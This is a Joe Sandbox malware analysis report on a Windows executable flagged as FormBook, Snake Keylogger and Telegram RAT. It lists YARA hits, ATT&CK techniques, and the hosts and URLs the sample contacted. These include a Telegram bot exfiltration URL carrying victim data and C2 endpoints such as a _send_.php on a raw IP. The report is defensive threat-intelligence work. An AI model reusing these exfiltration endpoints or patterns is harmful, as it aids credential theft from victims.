Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: BgroUcYHpy.exe	Binary or memory string: WIN_81
Source: BgroUcYHpy.exe	Binary or memory string: WIN_XP
Source: BgroUcYHpy.exe	Binary or memory string: WIN_XPe
Source: BgroUcYHpy.exe	Binary or memory string: WIN_VISTA
Source: BgroUcYHpy.exe	Binary or memory string: WIN_7
Source: BgroUcYHpy.exe	Binary or memory string: WIN_8
Source: BgroUcYHpy.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_002C6283
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_002C6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	2 Valid Accounts	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BgroUcYHpy.exe	58%	ReversingLabs	Win32.Backdoor.FormBook
BgroUcYHpy.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://varders.kozow.com:8081	100%	Avira URL Cloud	malware
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	phishing
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	phishing
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2008/01/2025%20/%2023:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20a	svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.office.com/lB	svchost.exe, 00000002.00000002.4484780955.0000000005547000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en0	svchost.exe, 00000002.00000002.4484780955.000000000550C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	svchost.exe, 00000002.00000002.4484780955.000000000551B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.000000000550C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aborters.duckdns.org:8081	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enl	svchost.exe, 00000002.00000002.4484780955.000000000551B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/l	svchost.exe, 00000002.00000002.4484780955.000000000554C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	svchost.exe, 00000002.00000002.4484780955.0000000005516000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	svchost.exe, 00000002.00000002.4484780955.000000000545E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005419000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	svchost.exe, 00000002.00000002.4484780955.000000000545E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.0000000005485000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000002.00000002.4485919935.0000000006423000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4485919935.000000000666A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053EF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586030
Start date and time:	2025-01-08 16:33:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BgroUcYHpy.exe renamed because original name is a hash value
Original Sample Name:	d1d603468cbebf5aa215f2a2dce10d9326ab2c913fd5dd6e9ba003884581a335.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 54 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: BgroUcYHpy.exe

Simulations

Behavior and APIs

Time	Type	Description
10:34:07	API Interceptor	10482992x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	spreadmalware.exe	Get hash	malicious	XWorm	Browse
	random.exe	Get hash	malicious	CStealer	Browse
	random.exe	Get hash	malicious	CStealer	Browse
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc	Browse
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
158.101.44.242	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
checkip.dyndns.com	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VSLS SCHEDULE_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	New order 2025.msg	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
api.telegram.org	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	random.exe	Get hash	malicious	CStealer	Browse	149.154.167.220
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	149.154.167.220
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Resource.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
